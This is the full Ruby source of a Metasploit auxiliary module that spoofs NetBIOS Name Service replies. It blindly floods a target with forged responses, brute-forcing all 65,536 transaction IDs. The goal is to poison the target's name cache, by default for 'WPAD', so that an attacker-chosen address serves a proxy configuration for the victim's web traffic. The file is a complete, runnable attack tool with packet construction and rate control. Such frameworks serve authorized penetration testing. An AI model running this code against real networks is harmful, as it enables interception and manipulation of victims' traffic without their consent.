##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
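# NetBIOS Name Service (NBNS, UDP/137) response spoofer.
#
# NBNS carries no authentication: a host that asked "who is WPAD?" accepts the
# first well-formed response whose 16-bit transaction ID matches its query.
# This module does not wait for a query; it blindly floods the target with
# positive responses, cycling through every possible transaction ID, so that
# one of them lands while a matching query is outstanding and the bogus
# NBNAME -> NBADDR mapping is cached. The classic target name is 'WPAD',
# because a poisoned WPAD entry lets NBADDR hand out a proxy configuration for
# the victim's HTTP traffic.
#
# Only the transaction ID is brute-forced; whether the target accepts a reply
# from RPORT (137 by default) and how long the poisoned entry survives are
# properties of the target stack and are not verified here. Use only against
# systems you are authorized to test.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  # Maximum NetBIOS name length. The encoded name is 16 bytes: 15 characters
  # (space padded) plus a one-byte suffix, which this module fixes to 0x00
  # (workstation service). pack('A15') silently truncates longer input, so we
  # warn the operator rather than spoof a name they did not intend.
  NBNAME_MAX_LEN = 15

  def initialize
    super(
      'Name' => 'NetBIOS Response Brute Force Spoof (Direct)',
      'Description' => %q{
        This module continuously spams NetBIOS responses to a target for given hostname,
        causing the target to cache a malicious address for this name. On high-speed local
        networks, the PPSRATE value should be increased to speed up this attack. As an
        example, a value of around 30,000 is almost 100% successful when spoofing a
        response for a 'WPAD' lookup. Distant targets may require more time and lower
        rates for a successful attack.
      },
      'Author' => [
        'vvalien', # Metasploit Module (post)
        'hdm', # Metasploit Module
        'tombkeeper' # Related Work
      ],
      'License' => MSF_LICENSE,
    )

    register_options(
      [
        Opt::RPORT(137),
        OptString.new('NBNAME', [ true, 'The NetBIOS name to spoof a reply for', 'WPAD' ]),
        OptAddress.new('NBADDR', [ true, 'The address that the NetBIOS name should resolve to', Rex::Socket.source_address('50.50.50.50') ]),
        OptInt.new('PPSRATE', [ true, 'The rate at which to send NetBIOS replies', 1_000])
      ],
      self.class
    )
  end

  # Build one NBNS positive name-query response mapping @fake_name to
  # @fake_addr. The first two bytes (transaction ID) are a placeholder that
  # the send loop overwrites for every packet; everything else is constant
  # for the whole run.
  #
  # @return [String] the raw datagram, forced to binary encoding so that
  #   `payload[0, 2] = ...` in the send loop addresses bytes, not characters
  def build_response
    response =
      "\xff\xff" + # TX ID (placeholder, rewritten per packet by the brute-force loop)
      "\x85\x00" + # Flags = response + authoritative + recursion desired
      "\x00\x00" + # Questions = 0
      "\x00\x01" + # Answer RRs = 1
      "\x00\x00" + # Authority RRs = 0
      "\x00\x00" + # Additional RRs = 0
      "\x20" + # Encoded name length = 32 (16 name bytes, half-ASCII encoded)
      Rex::Proto::SMB::Utils.nbname_encode([@fake_name.upcase].pack('A15') + "\x00") + # name padded to 15 chars + 0x00 suffix
      "\x00" + # End of encoded name
      "\x00\x20" + # Type = NB
      "\x00\x01" + # Class = IN
      "\x00\x04\x93\xe0" + # TTL = 300000 seconds (~3.5 days): the poisoned entry should outlive the attack
      "\x00\x06" + # Datalength = 6
      "\x00\x00" + # NB flags = B-node, unique name
      Rex::Socket.addr_aton(@fake_addr) # IPv4 address the name resolves to
    response.b
  end

  # Flood the target with forged responses, cycling the transaction ID through
  # all 65536 values and starting over indefinitely. The loop ends only when
  # the target answers with ICMP port unreachable (surfaced as ECONNREFUSED on
  # the connected UDP socket) or the operator interrupts the module.
  def netbios_spam
    payload = build_response
    started = monotonic_now
    sent = 0

    print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")

    catch(:port_closed) do
      loop do
        0.upto(65535) do |txid|
          payload[0, 2] = [txid].pack('n')
          begin
            @sock.put(payload)
          rescue Errno::ECONNREFUSED
            print_error('Error: Target sent us an ICMP port unreachable, port is likely closed')
            throw :port_closed
          end
          sent += 1
          throttle(sent, started)
        end
      end
    end

    print_status('Cleaning up...')
  end

  # Crude rate limiter: once the running average exceeds PPSRATE, pause for
  # 10 ms. A monotonic clock is used so that a wall-clock step (NTP, VM
  # suspend/resume) cannot yield a zero or negative interval; with Time.now
  # that would either disable throttling (negative average) or raise
  # FloatDomainError when Infinity is converted with #to_i.
  #
  # @param sent [Integer] packets sent so far
  # @param started [Float] monotonic timestamp of the first packet
  def throttle(sent, started)
    elapsed = monotonic_now - started
    return if elapsed <= 0.0

    sleep(0.01) if (sent / elapsed).to_i > @targ_rate
  end

  # Seconds from an arbitrary fixed point, unaffected by clock adjustments.
  def monotonic_now
    Process.clock_gettime(Process::CLOCK_MONOTONIC)
  end

  # Entry point: validate options, open the UDP socket, run the flood and
  # always release the socket afterwards, including when the operator
  # interrupts the module or the connection fails.
  def run
    @sock = nil
    @targ_rate = datastore['PPSRATE']
    @fake_name = datastore['NBNAME']
    @fake_addr = datastore['NBADDR']

    # A zero or negative rate would make throttle() sleep after every packet.
    if @targ_rate <= 0
      fail_with(Failure::BadConfig, 'PPSRATE must be a positive number of packets per second')
    end

    if @fake_name.length > NBNAME_MAX_LEN
      print_warning("NBNAME is longer than #{NBNAME_MAX_LEN} characters; only '#{@fake_name[0, NBNAME_MAX_LEN]}' will be spoofed")
    end

    connect_udp
    @sock = udp_sock
    @targ_addr = rhost
    @targ_port = rport

    netbios_spam
  ensure
    disconnect_udp if @sock
  end
end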